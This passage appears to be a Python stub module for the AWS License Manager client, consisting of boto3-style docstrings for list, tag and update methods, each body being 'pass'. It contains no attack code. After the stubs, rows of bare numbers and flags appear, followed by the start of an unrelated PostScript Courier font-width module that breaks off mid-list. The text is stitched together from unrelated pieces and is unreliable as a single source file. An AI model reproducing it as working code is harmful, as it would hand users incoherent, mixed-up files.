'EnableCrossAccountsDiscovery': True|False,
'LicenseManagerResourceShareArn': 'string'
}
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def list_associations_for_license_configuration(LicenseConfigurationArn=None, MaxResults=None, NextToken=None):
"""
Lists the resource associations for the specified license configuration.
Resource associations need not consume licenses from a license configuration. For example, an AMI or a stopped instance might not consume a license (depending on the license rules).
See also: AWS API Documentation
Exceptions
:example: response = client.list_associations_for_license_configuration(
LicenseConfigurationArn='string',
MaxResults=123,
NextToken='string'
)
:type LicenseConfigurationArn: string
:param LicenseConfigurationArn: [REQUIRED]\nAmazon Resource Name (ARN) of a license configuration.\n
:type MaxResults: integer
:param MaxResults: Maximum number of results to return in a single call.
:type NextToken: string
:param NextToken: Token for the next set of results.
:rtype: dict
ReturnsResponse Syntax
{
'LicenseConfigurationAssociations': [
{
'ResourceArn': 'string',
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'ResourceOwnerId': 'string',
'AssociationTime': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
LicenseConfigurationAssociations (list) --
Information about the associations for the license configuration.
(dict) --
Describes an association with a license configuration.
ResourceArn (string) --
Amazon Resource Name (ARN) of the resource.
ResourceType (string) --
Type of server resource.
ResourceOwnerId (string) --
ID of the AWS account that owns the resource consuming licenses.
AssociationTime (datetime) --
Time when the license configuration was associated with the resource.
NextToken (string) --
Token for the next set of results.
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.FilterLimitExceededException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {
'LicenseConfigurationAssociations': [
{
'ResourceArn': 'string',
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'ResourceOwnerId': 'string',
'AssociationTime': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
:returns:
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.FilterLimitExceededException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
"""
pass
def list_failures_for_license_configuration_operations(LicenseConfigurationArn=None, MaxResults=None, NextToken=None):
"""
Lists the license configuration operations that failed.
See also: AWS API Documentation
Exceptions
:example: response = client.list_failures_for_license_configuration_operations(
LicenseConfigurationArn='string',
MaxResults=123,
NextToken='string'
)
:type LicenseConfigurationArn: string
:param LicenseConfigurationArn: [REQUIRED]\nAmazon Resource Name of the license configuration.\n
:type MaxResults: integer
:param MaxResults: Maximum number of results to return in a single call.
:type NextToken: string
:param NextToken: Token for the next set of results.
:rtype: dict
ReturnsResponse Syntax
{
'LicenseOperationFailureList': [
{
'ResourceArn': 'string',
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'ErrorMessage': 'string',
'FailureTime': datetime(2015, 1, 1),
'OperationName': 'string',
'ResourceOwnerId': 'string',
'OperationRequestedBy': 'string',
'MetadataList': [
{
'Name': 'string',
'Value': 'string'
},
]
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
LicenseOperationFailureList (list) --
License configuration operations that failed.
(dict) --
Describes the failure of a license operation.
ResourceArn (string) --
Amazon Resource Name (ARN) of the resource.
ResourceType (string) --
Resource type.
ErrorMessage (string) --
Error message.
FailureTime (datetime) --
Failure time.
OperationName (string) --
Name of the operation.
ResourceOwnerId (string) --
ID of the AWS account that owns the resource.
OperationRequestedBy (string) --
The requester is "License Manager Automated Discovery".
MetadataList (list) --
Reserved.
(dict) --
Reserved.
Name (string) --
Reserved.
Value (string) --
Reserved.
NextToken (string) --
Token for the next set of results.
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {
'LicenseOperationFailureList': [
{
'ResourceArn': 'string',
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'ErrorMessage': 'string',
'FailureTime': datetime(2015, 1, 1),
'OperationName': 'string',
'ResourceOwnerId': 'string',
'OperationRequestedBy': 'string',
'MetadataList': [
{
'Name': 'string',
'Value': 'string'
},
]
},
],
'NextToken': 'string'
}
:returns:
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
"""
pass
def list_license_configurations(LicenseConfigurationArns=None, MaxResults=None, NextToken=None, Filters=None):
"""
Lists the license configurations for your account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_license_configurations(
LicenseConfigurationArns=[
'string',
],
MaxResults=123,
NextToken='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
]
)
:type LicenseConfigurationArns: list
:param LicenseConfigurationArns: Amazon Resource Names (ARN) of the license configurations.\n\n(string) --\n\n
:type MaxResults: integer
:param MaxResults: Maximum number of results to return in a single call.
:type NextToken: string
:param NextToken: Token for the next set of results.
:type Filters: list
:param Filters: Filters to scope the results. The following filters and logical operators are supported:\n\nlicenseCountingType - The dimension on which licenses are counted (vCPU). Logical operators are EQUALS | NOT_EQUALS .\nenforceLicenseCount - A Boolean value that indicates whether hard license enforcement is used. Logical operators are EQUALS | NOT_EQUALS .\nusagelimitExceeded - A Boolean value that indicates whether the available licenses have been exceeded. Logical operators are EQUALS | NOT_EQUALS .\n\n\n(dict) --A filter name and value pair that is used to return more specific results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs.\n\nName (string) --Name of the filter. Filter names are case-sensitive.\n\nValues (list) --Filter values. Filter values are case-sensitive.\n\n(string) --\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'LicenseConfigurations': [
{
'LicenseConfigurationId': 'string',
'LicenseConfigurationArn': 'string',
'Name': 'string',
'Description': 'string',
'LicenseCountingType': 'vCPU'|'Instance'|'Core'|'Socket',
'LicenseRules': [
'string',
],
'LicenseCount': 123,
'LicenseCountHardLimit': True|False,
'ConsumedLicenses': 123,
'Status': 'string',
'OwnerAccountId': 'string',
'ConsumedLicenseSummaryList': [
{
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'ConsumedLicenses': 123
},
],
'ManagedResourceSummaryList': [
{
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'AssociationCount': 123
},
],
'ProductInformationList': [
{
'ResourceType': 'string',
'ProductInformationFilterList': [
{
'ProductInformationFilterName': 'string',
'ProductInformationFilterValue': [
'string',
],
'ProductInformationFilterComparator': 'string'
},
]
},
],
'AutomatedDiscoveryInformation': {
'LastRunTime': datetime(2015, 1, 1)
}
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
LicenseConfigurations (list) --
Information about the license configurations.
(dict) --
A license configuration is an abstraction of a customer license agreement that can be consumed and enforced by License Manager. Components include specifications for the license type (licensing by instance, socket, CPU, or vCPU), allowed tenancy (shared tenancy, Dedicated Instance, Dedicated Host, or all of these), host affinity (how long a VM must be associated with a host), and the number of licenses purchased and used.
LicenseConfigurationId (string) --
Unique ID of the license configuration.
LicenseConfigurationArn (string) --
Amazon Resource Name (ARN) of the license configuration.
Name (string) --
Name of the license configuration.
Description (string) --
Description of the license configuration.
LicenseCountingType (string) --
Dimension to use to track the license inventory.
LicenseRules (list) --
License rules.
(string) --
LicenseCount (integer) --
Number of licenses managed by the license configuration.
LicenseCountHardLimit (boolean) --
Number of available licenses as a hard limit.
ConsumedLicenses (integer) --
Number of licenses consumed.
Status (string) --
Status of the license configuration.
OwnerAccountId (string) --
Account ID of the license configuration\'s owner.
ConsumedLicenseSummaryList (list) --
Summaries for licenses consumed by various resources.
(dict) --
Details about license consumption.
ResourceType (string) --
Resource type of the resource consuming a license.
ConsumedLicenses (integer) --
Number of licenses consumed by the resource.
ManagedResourceSummaryList (list) --
Summaries for managed resources.
(dict) --
Summary information about a managed resource.
ResourceType (string) --
Type of resource associated with a license.
AssociationCount (integer) --
Number of resources associated with licenses.
ProductInformationList (list) --
Product information.
(dict) --
Describes product information for a license configuration.
ResourceType (string) --
Resource type. The value is SSM_MANAGED .
ProductInformationFilterList (list) --
Product information filters. The following filters and logical operators are supported:
Application Name - The name of the application. Logical operator is EQUALS .
Application Publisher - The publisher of the application. Logical operator is EQUALS .
Application Version - The version of the application. Logical operator is EQUALS .
Platform Name - The name of the platform. Logical operator is EQUALS .
Platform Type - The platform type. Logical operator is EQUALS .
License Included - The type of license included. Logical operators are EQUALS and NOT_EQUALS . Possible values are sql-server-enterprise | sql-server-standard | sql-server-web | windows-server-datacenter .
(dict) --
Describes product information filters.
ProductInformationFilterName (string) --
Filter name.
ProductInformationFilterValue (list) --
Filter value.
(string) --
ProductInformationFilterComparator (string) --
Logical operator.
AutomatedDiscoveryInformation (dict) --
Automated discovery information.
LastRunTime (datetime) --
Time that automated discovery last ran.
NextToken (string) --
Token for the next set of results.
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.FilterLimitExceededException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {
'LicenseConfigurations': [
{
'LicenseConfigurationId': 'string',
'LicenseConfigurationArn': 'string',
'Name': 'string',
'Description': 'string',
'LicenseCountingType': 'vCPU'|'Instance'|'Core'|'Socket',
'LicenseRules': [
'string',
],
'LicenseCount': 123,
'LicenseCountHardLimit': True|False,
'ConsumedLicenses': 123,
'Status': 'string',
'OwnerAccountId': 'string',
'ConsumedLicenseSummaryList': [
{
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'ConsumedLicenses': 123
},
],
'ManagedResourceSummaryList': [
{
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'AssociationCount': 123
},
],
'ProductInformationList': [
{
'ResourceType': 'string',
'ProductInformationFilterList': [
{
'ProductInformationFilterName': 'string',
'ProductInformationFilterValue': [
'string',
],
'ProductInformationFilterComparator': 'string'
},
]
},
],
'AutomatedDiscoveryInformation': {
'LastRunTime': datetime(2015, 1, 1)
}
},
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_license_specifications_for_resource(ResourceArn=None, MaxResults=None, NextToken=None):
"""
Describes the license configurations for the specified resource.
See also: AWS API Documentation
Exceptions
:example: response = client.list_license_specifications_for_resource(
ResourceArn='string',
MaxResults=123,
NextToken='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nAmazon Resource Name (ARN) of a resource that has an associated license configuration.\n
:type MaxResults: integer
:param MaxResults: Maximum number of results to return in a single call.
:type NextToken: string
:param NextToken: Token for the next set of results.
:rtype: dict
ReturnsResponse Syntax
{
'LicenseSpecifications': [
{
'LicenseConfigurationArn': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
LicenseSpecifications (list) --
License configurations associated with a resource.
(dict) --
Details for associating a license configuration with a resource.
LicenseConfigurationArn (string) --
Amazon Resource Name (ARN) of the license configuration.
NextToken (string) --
Token for the next set of results.
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {
'LicenseSpecifications': [
{
'LicenseConfigurationArn': 'string'
},
],
'NextToken': 'string'
}
:returns:
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
"""
pass
def list_resource_inventory(MaxResults=None, NextToken=None, Filters=None):
"""
Lists resources managed using Systems Manager inventory.
See also: AWS API Documentation
Exceptions
:example: response = client.list_resource_inventory(
MaxResults=123,
NextToken='string',
Filters=[
{
'Name': 'string',
'Condition': 'EQUALS'|'NOT_EQUALS'|'BEGINS_WITH'|'CONTAINS',
'Value': 'string'
},
]
)
:type MaxResults: integer
:param MaxResults: Maximum number of results to return in a single call.
:type NextToken: string
:param NextToken: Token for the next set of results.
:type Filters: list
:param Filters: Filters to scope the results. The following filters and logical operators are supported:\n\naccount_id - The ID of the AWS account that owns the resource. Logical operators are EQUALS | NOT_EQUALS .\napplication_name - The name of the application. Logical operators are EQUALS | BEGINS_WITH .\nlicense_included - The type of license included. Logical operators are EQUALS | NOT_EQUALS . Possible values are sql-server-enterprise | sql-server-standard | sql-server-web | windows-server-datacenter .\nplatform - The platform of the resource. Logical operators are EQUALS | BEGINS_WITH .\nresource_id - The ID of the resource. Logical operators are EQUALS | NOT_EQUALS .\n\n\n(dict) --An inventory filter.\n\nName (string) -- [REQUIRED]Name of the filter.\n\nCondition (string) -- [REQUIRED]Condition of the filter.\n\nValue (string) --Value of the filter.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'ResourceInventoryList': [
{
'ResourceId': 'string',
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'ResourceArn': 'string',
'Platform': 'string',
'PlatformVersion': 'string',
'ResourceOwningAccountId': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
ResourceInventoryList (list) --
Information about the resources.
(dict) --
Details about a resource.
ResourceId (string) --
ID of the resource.
ResourceType (string) --
Type of resource.
ResourceArn (string) --
Amazon Resource Name (ARN) of the resource.
Platform (string) --
Platform of the resource.
PlatformVersion (string) --
Platform version of the resource in the inventory.
ResourceOwningAccountId (string) --
ID of the account that owns the resource.
NextToken (string) --
Token for the next set of results.
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.FilterLimitExceededException
LicenseManager.Client.exceptions.FailedDependencyException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {
'ResourceInventoryList': [
{
'ResourceId': 'string',
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'ResourceArn': 'string',
'Platform': 'string',
'PlatformVersion': 'string',
'ResourceOwningAccountId': 'string'
},
],
'NextToken': 'string'
}
:returns:
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.FilterLimitExceededException
LicenseManager.Client.exceptions.FailedDependencyException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
"""
pass
def list_tags_for_resource(ResourceArn=None):
"""
Lists the tags for the specified license configuration.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_resource(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nAmazon Resource Name (ARN) of the license configuration.\n
:rtype: dict
ReturnsResponse Syntax{
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
Response Structure
(dict) --
Tags (list) --Information about the tags.
(dict) --Details about a tag for a license configuration.
Key (string) --Tag key.
Value (string) --Tag value.
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
"""
pass
def list_usage_for_license_configuration(LicenseConfigurationArn=None, MaxResults=None, NextToken=None, Filters=None):
"""
Lists all license usage records for a license configuration, displaying license consumption details by resource at a selected point in time. Use this action to audit the current license consumption for any license inventory and configuration.
See also: AWS API Documentation
Exceptions
:example: response = client.list_usage_for_license_configuration(
LicenseConfigurationArn='string',
MaxResults=123,
NextToken='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
]
)
:type LicenseConfigurationArn: string
:param LicenseConfigurationArn: [REQUIRED]\nAmazon Resource Name (ARN) of the license configuration.\n
:type MaxResults: integer
:param MaxResults: Maximum number of results to return in a single call.
:type NextToken: string
:param NextToken: Token for the next set of results.
:type Filters: list
:param Filters: Filters to scope the results. The following filters and logical operators are supported:\n\nresourceArn - The ARN of the license configuration resource. Logical operators are EQUALS | NOT_EQUALS .\nresourceType - The resource type (EC2_INSTANCE | EC2_HOST | EC2_AMI | SYSTEMS_MANAGER_MANAGED_INSTANCE). Logical operators are EQUALS | NOT_EQUALS .\nresourceAccount - The ID of the account that owns the resource. Logical operators are EQUALS | NOT_EQUALS .\n\n\n(dict) --A filter name and value pair that is used to return more specific results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs.\n\nName (string) --Name of the filter. Filter names are case-sensitive.\n\nValues (list) --Filter values. Filter values are case-sensitive.\n\n(string) --\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'LicenseConfigurationUsageList': [
{
'ResourceArn': 'string',
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'ResourceStatus': 'string',
'ResourceOwnerId': 'string',
'AssociationTime': datetime(2015, 1, 1),
'ConsumedLicenses': 123
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
LicenseConfigurationUsageList (list) --
Information about the license configurations.
(dict) --
Details about the usage of a resource associated with a license configuration.
ResourceArn (string) --
Amazon Resource Name (ARN) of the resource.
ResourceType (string) --
Type of resource.
ResourceStatus (string) --
Status of the resource.
ResourceOwnerId (string) --
ID of the account that owns the resource.
AssociationTime (datetime) --
Time when the license configuration was initially associated with the resource.
ConsumedLicenses (integer) --
Number of licenses consumed by the resource.
NextToken (string) --
Token for the next set of results.
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.FilterLimitExceededException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {
'LicenseConfigurationUsageList': [
{
'ResourceArn': 'string',
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'ResourceStatus': 'string',
'ResourceOwnerId': 'string',
'AssociationTime': datetime(2015, 1, 1),
'ConsumedLicenses': 123
},
],
'NextToken': 'string'
}
:returns:
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.FilterLimitExceededException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
"""
pass
def tag_resource(ResourceArn=None, Tags=None):
"""
Adds the specified tags to the specified license configuration.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
ResourceArn='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nAmazon Resource Name (ARN) of the license configuration.\n
:type Tags: list
:param Tags: [REQUIRED]\nOne or more tags.\n\n(dict) --Details about a tag for a license configuration.\n\nKey (string) --Tag key.\n\nValue (string) --Tag value.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {}
:returns:
(dict) --
"""
pass
def untag_resource(ResourceArn=None, TagKeys=None):
"""
Removes the specified tags from the specified license configuration.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
ResourceArn='string',
TagKeys=[
'string',
]
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nAmazon Resource Name (ARN) of the license configuration.\n
:type TagKeys: list
:param TagKeys: [REQUIRED]\nKeys identifying the tags to remove.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {}
:returns:
(dict) --
"""
pass
def update_license_configuration(LicenseConfigurationArn=None, LicenseConfigurationStatus=None, LicenseRules=None, LicenseCount=None, LicenseCountHardLimit=None, Name=None, Description=None, ProductInformationList=None):
"""
Modifies the attributes of an existing license configuration.
A license configuration is an abstraction of a customer license agreement that can be consumed and enforced by License Manager. Components include specifications for the license type (licensing by instance, socket, CPU, or vCPU), allowed tenancy (shared tenancy, Dedicated Instance, Dedicated Host, or all of these), host affinity (how long a VM must be associated with a host), and the number of licenses purchased and used.
See also: AWS API Documentation
Exceptions
:example: response = client.update_license_configuration(
LicenseConfigurationArn='string',
LicenseConfigurationStatus='AVAILABLE'|'DISABLED',
LicenseRules=[
'string',
],
LicenseCount=123,
LicenseCountHardLimit=True|False,
Name='string',
Description='string',
ProductInformationList=[
{
'ResourceType': 'string',
'ProductInformationFilterList': [
{
'ProductInformationFilterName': 'string',
'ProductInformationFilterValue': [
'string',
],
'ProductInformationFilterComparator': 'string'
},
]
},
]
)
:type LicenseConfigurationArn: string
:param LicenseConfigurationArn: [REQUIRED]\nAmazon Resource Name (ARN) of the license configuration.\n
:type LicenseConfigurationStatus: string
:param LicenseConfigurationStatus: New status of the license configuration.
:type LicenseRules: list
:param LicenseRules: New license rules.\n\n(string) --\n\n
:type LicenseCount: integer
:param LicenseCount: New number of licenses managed by the license configuration.
:type LicenseCountHardLimit: boolean
:param LicenseCountHardLimit: New hard limit of the number of available licenses.
:type Name: string
:param Name: New name of the license configuration.
:type Description: string
:param Description: New description of the license configuration.
:type ProductInformationList: list
:param ProductInformationList: New product information.\n\n(dict) --Describes product information for a license configuration.\n\nResourceType (string) -- [REQUIRED]Resource type. The value is SSM_MANAGED .\n\nProductInformationFilterList (list) -- [REQUIRED]Product information filters. The following filters and logical operators are supported:\n\nApplication Name - The name of the application. Logical operator is EQUALS .\nApplication Publisher - The publisher of the application. Logical operator is EQUALS .\nApplication Version - The version of the application. Logical operator is EQUALS .\nPlatform Name - The name of the platform. Logical operator is EQUALS .\nPlatform Type - The platform type. Logical operator is EQUALS .\nLicense Included - The type of license included. Logical operators are EQUALS and NOT_EQUALS . Possible values are sql-server-enterprise | sql-server-standard | sql-server-web | windows-server-datacenter .\n\n\n(dict) --Describes product information filters.\n\nProductInformationFilterName (string) -- [REQUIRED]Filter name.\n\nProductInformationFilterValue (list) -- [REQUIRED]Filter value.\n\n(string) --\n\n\nProductInformationFilterComparator (string) -- [REQUIRED]Logical operator.\n\n\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {}
:returns:
(dict) --
"""
pass
def update_license_specifications_for_resource(ResourceArn=None, AddLicenseSpecifications=None, RemoveLicenseSpecifications=None):
"""
Adds or removes the specified license configurations for the specified AWS resource.
You can update the license specifications of AMIs, instances, and hosts. You cannot update the license specifications for launch templates and AWS CloudFormation templates, as they send license configurations to the operation that creates the resource.
See also: AWS API Documentation
Exceptions
:example: response = client.update_license_specifications_for_resource(
ResourceArn='string',
AddLicenseSpecifications=[
{
'LicenseConfigurationArn': 'string'
},
],
RemoveLicenseSpecifications=[
{
'LicenseConfigurationArn': 'string'
},
]
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nAmazon Resource Name (ARN) of the AWS resource.\n
:type AddLicenseSpecifications: list
:param AddLicenseSpecifications: ARNs of the license configurations to add.\n\n(dict) --Details for associating a license configuration with a resource.\n\nLicenseConfigurationArn (string) -- [REQUIRED]Amazon Resource Name (ARN) of the license configuration.\n\n\n\n\n
:type RemoveLicenseSpecifications: list
:param RemoveLicenseSpecifications: ARNs of the license configurations to remove.\n\n(dict) --Details for associating a license configuration with a resource.\n\nLicenseConfigurationArn (string) -- [REQUIRED]Amazon Resource Name (ARN) of the license configuration.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.InvalidResourceStateException
LicenseManager.Client.exceptions.LicenseUsageException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {}
:returns:
(dict) --
"""
pass
def update_service_settings(S3BucketArn=None, SnsTopicArn=None, OrganizationConfiguration=None, EnableCrossAccountsDiscovery=None):
"""
Updates License Manager settings for the current Region.
See also: AWS API Documentation
Exceptions
:example: response = client.update_service_settings(
S3BucketArn='string',
SnsTopicArn='string',
OrganizationConfiguration={
'EnableIntegration': True|False
},
EnableCrossAccountsDiscovery=True|False
)
:type S3BucketArn: string
:param S3BucketArn: Amazon Resource Name (ARN) of the Amazon S3 bucket where the License Manager information is stored.
:type SnsTopicArn: string
:param SnsTopicArn: Amazon Resource Name (ARN) of the Amazon SNS topic used for License Manager alerts.
:type OrganizationConfiguration: dict
:param OrganizationConfiguration: Enables integration with AWS Organizations for cross-account discovery.\n\nEnableIntegration (boolean) -- [REQUIRED]Enables AWS Organization integration.\n\n\n
:type EnableCrossAccountsDiscovery: boolean
:param EnableCrossAccountsDiscovery: Activates cross-account discovery.
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {}
:returns:
(dict) --
"""
pass
| 30.858995
| 1,246
| 0.688375
| 5,412
| 57,120
| 7.221729
| 0.095898
| 0.064988
| 0.097482
| 0.01791
| 0.79759
| 0.76658
| 0.740482
| 0.726717
| 0.716662
| 0.697498
| 0
| 0.004693
| 0.227854
| 57,120
| 1,850
| 1,247
| 30.875676
| 0.881465
| 0.956373
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
4f3618fc1fbac32786c0dc6f71396e9e55d0e848
| 1,926
|
py
|
Python
|
src/printing/fonts/PSFont_Courier.py
|
vadmium/grailbrowser
|
ca94e6db2359bcb16c0da256771550d1327c6d33
|
[
"CNRI-Python",
"CNRI-Jython"
] | 9
|
2015-03-23T23:21:42.000Z
|
2021-08-01T01:47:22.000Z
|
src/printing/fonts/PSFont_Courier.py
|
vadmium/grailbrowser
|
ca94e6db2359bcb16c0da256771550d1327c6d33
|
[
"CNRI-Python",
"CNRI-Jython"
] | null | null | null |
src/printing/fonts/PSFont_Courier.py
|
vadmium/grailbrowser
|
ca94e6db2359bcb16c0da256771550d1327c6d33
|
[
"CNRI-Python",
"CNRI-Jython"
] | 11
|
2015-03-23T23:22:22.000Z
|
2020-06-08T14:24:17.000Z
|
# Character width information for PostScript font `Courier'
# generated from the Adobe Font Metric file `../../../../adobe/com_____.afm'. Adobe
# copyright notice follows:
#
# Copyright (c) 1989, 1990, 1991 Adobe Systems Incorporated. All rights reserved.
#
from . import PSFont
font = PSFont.PSFont('Courier', 'Courier',
[ 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
600, 600, 600, 600, 600, 600, 600, 600,
